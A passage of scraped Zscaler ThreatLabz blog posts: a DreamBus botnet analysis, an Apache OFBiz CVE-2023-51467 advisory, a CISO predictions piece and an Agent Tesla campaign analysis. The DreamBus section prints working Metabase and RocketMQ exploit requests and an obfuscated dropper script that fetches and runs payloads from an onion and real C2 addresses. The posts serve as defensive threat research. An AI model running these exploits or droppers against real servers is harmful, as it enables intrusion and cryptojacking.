hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3 RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')\n$$" }, "name": "meta-base-sex", "engine": "h2" } } DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo "([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum :]]{12})"|tail -n 1);After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.sed -i \"s/setup-token/$setup_token/g\" /tmp/.json%s;Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:curl -X POST -4fs -H \"Content-Type: application/json\" -d @/tmp/.json%s %s:%d/api/setup/validate &>/dev/null;rm -f /tmp/.json%sIf the exploit is successful, the following bash script will download and execute the DreamBus main module:exec &>/dev/null LHjFgxtn=./.$(date|md5sum|head -c20) uPXAiDgp=( AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system d-logind.service-vkHzrg" VdHfWQsU="curl -m60 -fsSLkA- --doh-url https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query" JtkrXMaj="curl -m60 -fsSLkA-" MTWuGlJu="" PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad" PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin :/usr/local/sbin:$PATH jJcSNhfn() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } wtJymANw() { for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } OUneYJaz() { beKjoWyW=/exec yXCmWOnw=mb0_$(curl -4||curl -4$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) $VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn } ZVdmcgjf() { chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn } RAKjFxFv() { u=$ cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp wtJymANw OUneYJaz $ || OUneYJaz $ || OUneYJaz $ ZVdmcgjf } ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv rm -f /home/user/.bash_historyApache RocketMQ Exploit Module (CVE-2023-33246)Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:00000000 00 00 00 c8 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":| 00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan| 00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o| 00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial| 00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP| 00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi| 00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe| 00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke| 00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh| 00000090 20 2e 20 65 63 68 6f 20 63 75 72 6c 20 2d 66 73 | . echo curl -fs| 000000a0 53 6b 4c 41 2d 20 39 32 2e 32 30 34 2e 32 34 33 |SkLA- 92.204.243| 000000b0 2e 31 35 35 3a 38 30 38 30 2f 72 6f 6b 65 74 20 |.155:8080/roket | 000000c0 2d 6f 20 72 65 6b 65 74 65 64 3b 0a |-o reketed;.|The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:-c $@|sh . echo curl -fsSkLA- -o reketed;If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:z3glwn;rm -f reketed exec &>/dev/null BDrFYzWg=./.$(date|md5sum|head -c20) qyynvpBQ=( sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system d-logind.service-z3glwn" GRPoNTxD="curl -m60 -fsSLkA- --doh-url https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query" ZwJtGQaC="curl -m60 -fsSLkA-" HNPDsmwz="" HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad" PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin :/usr/local/sbin:$PATH eGiAsomX() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } bCQYhArV() { for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } XNSBjYOO() { HoVCQHFu=/exec LouMQEck=rq1_$(curl -s4||curl -4$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) $GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg } MPQKanDg() { chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg } dtOFCAtT() { u=$ cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp bCQYhArV XNSBjYOO $ || XNSBjYOO $ || XNSBjYOO $ MPQKanDg } ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:00000000 00 00 00 a2 00 00 00 60 7b 22 63 6f 64 65 22 3a |.......`{"code":| 00000010 32 35 2c 22 66 6c 61 67 22 3a 30 2c 22 6c 61 6e |25,"flag":0,"lan| 00000020 67 75 61 67 65 22 3a 22 4a 41 56 41 22 2c 22 6f |guage":"JAVA","o| 00000030 70 61 71 75 65 22 3a 30 2c 22 73 65 72 69 61 6c |paque":0,"serial| 00000040 69 7a 65 54 79 70 65 43 75 72 72 65 6e 74 52 50 |izeTypeCurrentRP| 00000050 43 22 3a 22 4a 53 4f 4e 22 2c 22 76 65 72 73 69 |C":"JSON","versi| 00000060 6f 6e 22 3a 33 39 35 7d 66 69 6c 74 65 72 53 65 |on":395}filterSe| 00000070 72 76 65 72 4e 75 6d 73 3d 31 0a 72 6f 63 6b 65 |rverNums=1.rocke| 00000080 74 6d 71 48 6f 6d 65 3d 2d 63 20 24 40 7c 73 68 |tmqHome=-c $@|sh| 00000090 20 2e 20 65 63 68 6f 20 62 61 73 68 20 72 65 6b | . echo bash rek| 000000a0 65 74 65 64 3b 0a |eted;.|The bash script will then download and execute the main DreamBus module.Conclusion DreamBus continues to pose a threat to organizations with brute force attacks against PostgreSQL, SSH, and Redis along with new exploits that target recent vulnerabilities in popular business applications. Zscaler ThreatLabz recommends that organizations properly secure all applications that are both publicly and privately accessible. Strong passwords and multi-factor authentication (MFA) should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify potential compromises. Zscaler Coverage Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below: ELF32.Coinminer.DreamBus ELF32.Coinminer.XMRig Linux.Worm.SSHSpreader Indicators of Compromise (IOCs) The following IOCs can be used to detect a DreamBus infection. Samples SHA256 Hash Module Name cd647d4497661bf0a7f9a11fd5ca84d52 f49d4cca74941a31cf631c8f6bc88d2 DreamBus PostgreSQL module 5d1721d4d362ddcdbd0762eccdb4e07b0 cc1c26c7d69da30e024e70c7063c519 DreamBus Redis module 9f49375ae05c16d80e02c21f178429602 f726ce87295b9dfd9458f37956392e3 DreamBus Metabase module 25d7b17521629f0861113b1e9f7653dc1 9c40b1d8f3de685ba29108a0d9fa7aa DreamBus Hadoop Yarn module 34603862c5086a9063e42d79fb094e8d8 9e3aeef6f8eadf23c6925c6a4201a9c DreamBus Hashicorp Consul module b86fa919ab9ebaa3f8ead4f7ef6ee0bb9 4a3a1b7d9583e99598893f2738a1c71 DreamBus RocketMQ module e52b70a76e382ffd2aff02d1d26269036 c589676ba1f2086051c11cb7997a5a5 DreamBus SSH module 5a55acdae38219411b2f3350db425d888 3d6238e465d07a71cadfe89877df6ac DreamBus XMRig miner Network indicators Domain/IP Address Description ru6r4inkaf4thlgflg4iqs5mhqwqubols 5qagspvya4whp3dgbvmyhad[.]onion DreamBus C2 domain 139.59.150[.]7 DreamBus C2 IP address 92.204.243[.]155 DreamBus C2 IP address p2pool[.]it DreamBus Monero mining pool Host indicators Filenames Description /tmp/.systemd.3 DreamBus module lock file /tmp/.json[ipaddress] DreamBus Metabase exploit staged payload file Password lists SSH PostgreSQL and Redis (the same password list is currently used for both applications) Thu, 11 ene 2024 08:30:01 -0800 Brett Stone-Gross Apache OFBiz Authentication Bypass Vulnerability (CVE-2023-51467) Introduction On December 26, 2023, researchers at SonicWall announced the discovery of a zero-day security flaw in Apache OFBiz. Tracked as CVE-2023-51467, the vulnerability allows threat actors to bypass authentication and perform a Server-Side Request Forgery (SSRF). CVE-2023-51467 earned a critical CVSS score of 9.8. According to researchers at SonicWall, a patch released for another vulnerability, CVE-2023-49070, left the initial issue unresolved, making authentication bypass possible. Recommendations Zscaler ThreatLabz strongly advises users of Apache OFBiz software to promptly upgrade to version 18.12.11, as this version contains crucial fixes to mitigate the identified security vulnerability (CVE-2023-51467). Affected Versions The following versions of Apache OFBiz are affected by the disclosed vulnerabilities and should be updated immediately: All versions 18.12.10 and below are impacted by CVE-2023-51467 All versions 18.12.9 and below are impacted by CVE-2023-49070 Background Apache OFBiz is an open-source Enterprise Resource Planning (ERP) system that provides business solutions for various industries. This includes tools to manage operations like customer relationships, order processing, human resource functions, and warehouse management. On December 4, 2023, Apache released a patch to fix CVE-2023-49070. For this fix, Apache removed the XMLRPC endpoint and the OFBiz XMLRPC library, which was not maintained regularly. However, this fix didn’t resolve the root cause of CVE-2023-49070. While validating the fix for CVE-2023-49070, researchers from SonicWall bypassed authentication in the newly fixed version of Apache OFBiz, leading to CVE-2023-51467. How It Works A threat actor sends an HTTP request to exploit a flaw in the checkLogin function. When null or invalid username and password parameters are supplied and the requirePasswordChange parameter is set to Y in the URI, the checkLogin function fails to validate the credentials, leading to authentication bypass. This occurs because the program flow circumvents the conditional block meant to check the username and password fields. By manipulating login parameters, threat actors can achieve Remote Code Execution (RCE) on a target server. Zscaler Best Practices Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on. Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware. Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as part of a second-stage payload. Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations. Conclusion Apache OFBiz systems should promptly be updated to version 18.12.11. Failing to do so leaves systems vulnerable to CVE-2023-51467, allowing threat actors to manipulate login parameters and execute arbitrary code on the target server. Zscaler Coverage The Zscaler ThreatLabz team has deployed the following. Zscaler Advanced Threat Protection APP.EXPLOIT.CVE-2023-49070 APP.EXPLOIT.CVE-2023-51467 Zscaler Private Access AppProtection 6000751 - Apache OFBiz XMLRPC Insecure Deserialization (CVE-2023-49070) 6000753 - Apache OFBiz Auth Bypass and Code Injection (CVE-2023-51467) For more details, visit the Zscaler Threat Library. References Mon, 08 ene 2024 09:01:05 -0800 Nishant Gupta Top 5 Cyber Predictions for 2024: A CISO Perspective Amidst the ever-evolving realm of enterprise security, a new year unfolds, introducing a dynamic array of emerging threats. While the “prediction season” gains momentum, it's pivotal to reflect on the high impact of the 2023 cybersecurity landscape. This past year set a profound stage, from the advent of stringent cyber regulations to the convergence of generative AI, social engineering, and ransomware. Let's delve into the rewind of 2023, exploring five influential trends and threats that molded the cyberthreat landscape and are poised to resonate throughout enterprises in 2024. 2023 Rewind — Cyber Trends and Threats The generative AI (r)evolution 2023 will be remembered as the year artificial intelligence (AI) rose to the forefront of our collective consciousness, ushering in never before seen opportunities and risks. The release of generative AI-powered applications like ChatGPT highlights the potential for AI and machine learning (ML) to reshape how organizations operate. In September, the Zscaler ThreatLabz team conducted an analysis of AI/ML and ChatGPT trends amongst enterprises stretching back across 2023 and, unsurprisingly, discovered upward trajectories in AI/ML traffic and usage. This adoption brings us to the flip side of the generative AI coin: attackers are leveraging AI tools to elevate and automate phishing campaigns, craft extremely evasive malware, and reduce the development time of threats across the board. Security leaders and enterprises find themselves at a new crossroads, tasked with delicately navigating the interplay of securely leveraging AI’s evolutionary advancements while confronting the unforeseen revolutionary challenges of safeguarding against AI-powered threats. Rampant ransomware — again The pervasive impact of ransomware resonated widely in 2023. ThreatLabz research revealed a 37% surge in ransomware attacks, accompanied by an average enterprise ransom demand of $5.3 million and an average payment exceeding $100,000. 2023 also saw the rise of Ransomware-as-a-Service (RaaS), a business model in which ransomware authors or gangs sell or lease their services on the dark web. The ransomware family BlackCat group, or ALPHV, emerged as a significant contributor to this unsettling trend, linking back to multiple high-profile attacks against casinos. Ransomware gangs also got stealthier in 2023, with ThreatLabz observing an increase in encryption-less extortion attacks. The absence of encryption allows attackers to eliminate development cycles and decryption support and quietly exfiltrate data before making ransom demands. Clop ransomware’s zero day attack on the file transfer tool MOVEit was the largest data theft of 2023, impacting 83 million individuals and nearly 3,000 organizations. This hack served as a stark reminder that the supply chain remains a critical vulnerability in enterprise security. More sophisticated social engineering Social engineering attacks were adept at exploiting human vulnerability before—now, with AI part of the equation, these attacks are more of a threat than ever. While AI enhanced the sophistication and effectiveness of common social engineering tactics like phishing and smishing scams, there was a notable shift towards vishing (voice phishing) attacks in 2023. The use of voice communications to deceive victims was particularly effective for the BlackCat affiliate ScatteredSpider—and damaging for the gaming industry. Last year, we witnessed the fast-evolving nature of social engineering attacks, and this evolution poses greater challenges for detection and defense. The fall of VPNs and firewalls The cyberthreats and trends of 2023 send a clear message to organizations: they must evolve their security strategies to the times and embrace a zero trust architecture. Legacy, perimeter-based architectures like traditional virtual private networks (VPNs) and firewalls are not only expanding the attack surface, but also exacerbating challenges for organizations that are up against increasingly sophisticated threats and cloud-first demands. In fact, 2023 saw an increase in VPN vulnerabilities and, accordingly, nearly 1 in 2 organizations reported that they experienced VPN-related attacks. With 92% of those organizations considering, planning, or in the midst of a zero trust implementation, it’s an encouraging sign that zero trust grew as a priority in 2023. Enterprise tools under attack 2023 saw threat actors, groups, and families pivot to targeting providers of core enterprise tools. These incidents highlight the increasing vulnerability of the broader digital supply chain and the interconnected nature of enterprise tools that are crucial to daily business operations. Whether driven by financial motives, the theft of valuable credentials, or even geopolitical interests in the case of nation-state attacks, the focus on these tools emphasizes the need for organizations to extend their cybersecurity protocol beyond their organizational walls. The solution? A more mature third party risk management program. 2024 Predictions — AI, RaaS, MiTM (and more) Many of the past year's most impactful trends and threats will persist, evolve, and shape the enterprise security landscape in the year ahead. Let’s explore five predictions that should be top of mind for security leaders and organizations. Prediction 1: Generative AI-Driven Attacks Generative AI-driven reconnaissance, exploitation, and phishing attacks will grow in volume. There is good reason for AI to be at the top of security experts’ predictions list again this year. GenAI and large language mode (LLM) tools will be the great enablers of 2024, continuing to lower the barrier to entry for threat actors. AI empowers threat actors to automate diverse tasks at scale, from identifying exposed assets like firewalls, VPNs, and VDIs to effortlessly compiling lists of known vulnerabilities or crafting sophisticated phishing emails. This level of scalability afforded by AI automation will undoubtedly continue to enhance the efficiency and reach of malicious activities this year. Reports of malicious versions of ChatGPT, like WormGPT, circulating on the dark web in 2023 signify two concerning trends: the potential for development of new malicious LLMs without any built-in ethical restraints, and the emergence of their use in threat campaigns. From suggesting attack ideas to automating development and execution processes, these AI tools have the potential to catapult cyberthreat evolution years into the future in mere months. What’s more, 2024 is an election year in the United States, and it is a strategic imperative as such to ensure the resilience of critical infrastructure against AI-powered misinformation and other elusive attacks. Organizations of every type will have to be more vigilant and take proactive security measures, from refreshed employee security training tailored to social engineering and AI-specific threats to holding vendors accountable for delivering AI-powered cybersecurity. We must fight fire with fire and use generative AI, machine learning, and deep learning techniques to protect data, devices, and networks against AI-powered threats. Prediction 2: Ransomware-as-a-Service Innovation Ransomware-as-a-Service will innovate and assist in the volume of successful attacks. The RaaS model is poised to further elevate cybercrime and empower less-skilled crime groups in 2024. In addition, we should anticipate a new wave and an increasing prevalence of initial access brokers, similar to Scattered Spider, that specialize in facilitating unauthorized access to target networks. Encryption-less attacks will continue to be a popular strategic tactic used by ransomware operators to evade detection, putting the onus on organizations to focus on detecting anomalous activity beyond the typical patterns associated with encryption-based ransomware. In navigating these evolving ransomware threats and trends, organizations must prioritize comprehensive zero trust protection strategies for every stage of the attack chain, from initial compromise to execution. Prediction 3: Rise in Man-in-the-Middle Attacks Failure to implement a zero trust architecture will result in an increase in man-in-the-middle (MiTM) attacks. MiTM threats will remain a significant concern for enterprises in 2024, exacerbated by Phishing-as-a-Service toolkits that democratize sophisticated MiTM attacks, making them accessible to a broader range of threat actors. This tactic targets users of a specific server or system and captures data in transit, such as user authentication credentials or cookies, by mimicking online services through proxy servers. The risks associated with MiTM phishing attacks—unauthorized access, data theft, and compromise of critical information—call for zero trust and advanced security measures. Without a proxy-based zero trust architecture, full TLS inspection, and FIDO2 multifactor authentication (MFA), organizations remain exposed to vulnerabilities in communication channels and user authentication. As such, it is imperative to prioritize these security measures in 2024. Prediction 4: Supply Chain Attacks on Generative AI Ecosystems & Development Environments Supply chain attacks will target vulnerable generative AI ecosystems. As supply chains become more interconnected and attacks more sophisticated in 2024, both upstream and downstream components of supply chains will be increasingly at risk. Namely, attackers will leverage new ways to strategically exploit weaknesses in various components beyond traditional attack vectors. As organizations integrate more AI components to their supply chains, LLMs and AI will increasingly be part of supply chain security conversations. If not adequately secured, an AI-powered supply chain can become a target for attackers seeking to poison AI training data, manipulate updates, inject malicious algorithms, engage in prompt engineering, or exploit vulnerabilities as an entry point to compromise organizations' data or systems. Organizations must recognize the critical role of a resilient supply chain in ensuring business continuity and overall resilience and prioritize investments to safeguard against the far-reaching consequences of supply chain compromise. Eliminating the internet-facing attack surface will be critical, and implementing zero trust security controls to stop lateral movement and block command-and-control activities will be instrumental in doing so. In short, enterprises must adopt a comprehensive approach to safeguard not only their internal AI applications but those of their suppliers, as well. Prediction 5: Attackers Respond to SEC Regulations Attacks will shift in response to the cyber regulations imposed by the U.S. Securities and Exchange Commission (SEC). Anticipating the impact of the new SEC regulations mandating disclosure of material breaches, it's likely that attackers will further hone their already adept stealth methods. Expect a heightened focus on covert strategies, leveraging sophisticated evasion techniques and encryption to prolong undetected access. Additionally, attackers may target non-material systems more frequently to navigate under the radar, gather intelligence, and discreetly escalate privileges. With an eye on evading immediate disclosure obligations, we could see a surge in third-party and supply chain vulnerability exploitation. In essence, the future threat landscape may dictate a predictive shift toward even more strategic and discreet approaches as attackers adapt to emerging regulatory frameworks. The SEC cyber regulations will also drive strategic shifts in security teams. The mandates for timely reporting of material incidents and annual reporting on cyber risk management will be a catalyst for more cross-functional collaboration in 2024. How will organizations prepare and comply with the reporting process? Do they have sufficient defense in depth and security governance? These questions—and their legal implications—will be a forcing function for cyber and corporate alignment. For many companies, this means that CISOs and security leaders will work closer than ever with CEOs, legal teams, and boards to develop processes for disclosure and strengthen their organization’s security posture. As the new year unfolds, security teams will have their work cut out for them. By prioritizing investments in a zero trust architecture, AI-based security controls, employee training, and strategic planning, you can build resilience and better protect against evolving threats. The Zscaler Zero Trust Exchange counters advanced attacks through TLS/SSL inspection, browser isolation, and policy-driven access controls, stops lateral movement with direct user-to-app connections, and prevents data loss with thorough inspection. Request a customized demo on how Zscaler can help address your organization’s security needs. Follow Zscaler ThreatLabz on X (Twitter) and our Security Research Blog to stay on top of the latest cyberthreats and security research. The Zscaler ThreatLabz threat research team continuously monitors threat intelligence from the world’s largest inline security cloud and shares its findings with the wider security community. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Tue, 02 ene 2024 08:00:01 -0800 Deepen Desai Threat Actors Exploit CVE-2017-11882 To Deliver Agent Tesla Introduction First discovered in 2014, Agent Tesla is an advanced keylogger with features like clipboard logging, screen keylogging, screen capturing, and extracting stored passwords from different web browsers. Recently, Zscaler ThreatLabz detected a threat campaign where threat actors leverage CVE-2017-11882 XLAM to spread Agent Tesla to users on vulnerable versions of Microsoft Office. The CVE-2017-11882 vulnerability is a remote code execution flaw found in the Equation Editor of Microsoft Office. It arises due to a weakness in how the software manages system memory for objects. In this blog, we examine the tactics employed by threat actors to deploy Agent Tesla malware using CVE-2017-11882. We shed light on the methods used for data theft and evasion strategies like obfuscation and anti-debugging techniques. Key Takeaways Threat actors strategically utilize words like “orders” and “invoices” in spam emails to encourage users to download malicious attachments containing CVE-2017-11882. Threat actors include a VBS file in their infection chain to add a layer of complexity to analysis and deobfuscation attempts. Threat actors use the RegAsm.exe file to carry out malicious activities under the guise of a genuine operation. Microsoft Excel Infection Sequence Threat actors begin the infection sequence by distributing spam emails with malicious attachments (like in Figure 1 and Figure 2 below) in hopes that users on vulnerable versions of Microsoft Excel open these emails and download the attachments. Figure 1: Spam email example Figure 2: Spam email example To make these spam emails seem legitimate, threat actors use words like “invoices” and “order” in the emails. This strategy lends authenticity to fraudulent emails and encourages users to download attachments. Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction. Figure 3, shown below, depicts how the first additional file downloaded is a heavily obfuscated VBS file. Figure 3: Malicious communication and additional file download Figure 4 shows the actual obfuscated VBS file. Figure 4: Obfuscated VBS file The VBS file incorporates variable names that are 100 characters long, adding a layer of complexity to the analysis and deobfuscation. The VBS file initiates the download of a malicious JPG file, as in Figure 5 below. Figure 5: Malicious JPG file (steganography image) The JPG file contains a Base64-encoded DLL, as shown in Figure 6. Figure 6: Base64-encoded DLL inside an image Threat actors inject a Base64-encoded DLL into an image to evade detection from antivirus programs. Once the JPG file downloads, the VBS file executes a PowerShell executable that retrieves the Base64-encoded DLL from the image file, decodes the DLL, and loads the malicious procedures from the decoded DLL. For accurate file retrieval, the threat actors utilize <<BASE64_START>> and <<BASE64_END>> tags. Figure 7, shown below, illustrates the command. Figure 7: Malicious command that loads and runs the DLL file After the PowerShell executes, it executes the RegAsm.exe file, as shown in Figure 8 below. While the primary function of RegAsm is typically associated with registry read-write operations, in this context, its purpose is to carry out malicious activities under the guise of a genuine operation. Figure 8: Process tree and thread injection in RegAsm.exe From here, the DLL fetches the Agent Tesla payload and injects a thread into the RegAsm process, as shown in Figure 9 below. Figure 9: Thread injected into RegAsm.exe Figure 10, shown below, depicts instances where Agent Tesla attempts to steal data from various browsers to send to a malicious destination controlled by threat actors. Figure 10: Browser data theft In addition to browser data, Agent Tesla targets credentials from both mail clients and FTP applications, as shown in Figure 11. Figure 11: Agent Tesla steals data from Outlook As shown below in Figure 12, Agent Tesla attempts to deploy keyboard and clipboard hooks to monitor all keystrokes and capture data copied by the user. Figure 12: Keyboard and clipboard hooks In Figure 13 below, Agent Tesla uses window hooking, a technique utilized to monitor event messages, mouse events, and keystrokes. When a user acts, the threat actor's function intercepts before the action occurs. Figure 13: Window hooking From here, the malware sends the exfiltrated data to a Telegram bot controlled by the threat actor, as shown in Figure 14 below. Figure 14: Exfiltrate to Telegram Conclusion Our blog provided an overview of the tactics employed by threat actors exploiting CVE-2017-11882 to deliver Agent Tesla, from their methods of data theft to evasion strategies, like obfuscation and anti-debugging techniques. Our analysis highlights how threat actors constantly adapt infection methods, making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the cybersecurity community. Zscaler Coverage Win32.Backdoor.Agenttesla.LZ XLS.Exploit.CVE-2017-11882 DOC.Exploit.CVE-2017-11882 Indicators of Compromise (IOCs) Telegram URLs used for exfiltration api.telegram[.]org/bot6362373796:AAFAjB2uG5ePhAcUiHforF23Ij_H_LDLFUs api.telegram[.]org/bot6475150763:AAFSaMWIpAeiCNQFdS0vxz0W6HCxWx96MFk/sendDocument api.telegram[.]org/bot6663697988:AAHBsfmbPr_JinYR7jDRpZloxUBi6EcQ6HE/sendDocument Malicious URLs 79.110.48[.]52/nicko.vbs 79.110.48[.]52/nix.txt Malicious Excel files 201CD0A2FC6A87D25D6AED1E975FAE71 (CVE-2017-11882) 38f6b4d5804de785b925eb46ddd86d6f (CVE-2017-11882) C1521547DEA051BD7A007516511FB2CA (CVE-2017-11882) dddabc8019a7184055301927239a9438 (CVE-2017-11882) Malicious VBS files F302ADDF3B4068888788D8EDCE8F52A0 1402E4408F123DA1E9BC3BDE078764FC A1C2B285A7FF9DD99C70E4D750EFEA51 Malicious JPG files 8496654930be3db6cea0ba62ffe5add9 d6f8c9a88cbdd876695f4bef56972f2e 8d17b59e8bb573b12a9d0e42746f8aef Malicious DLL files 8955B482E59894864BACE732302A9927 F5F51251DC672E1934746E0057011B1A 5630282A95AFD2A5CEEECC5ACF7FF053 Malicious executables 547b88c4aa225377d7d65e912d81fe28 87aa9fc1bf49d48234160a15515a8145 0ada110f82ce64fcfab0eb0e5d8d948e 32e9af7d07a5edcc9bf9b5c8121acc55 b551da554933c2c064f96aaa6aa9ff55 7ea06a0e6c1e5707a23364ae6984b4f3 f3f27883dc91a7c85a03342bf6fed475 7c9ad2b73748f8c745d5d49b9b4876c5 a8c8010963f35fc3253d6409c169a9f2 d6a1feb6cfa307c5031ea2dd2118d786 069bb6a37f9312ba4fea6c70b7134d39 6bdb7a11d0eaa407e7a7f34d794fb567 f11d72bc4192b2ed698cc2b0200773bf a55302ad4bf2f050513528a2ca64ff01 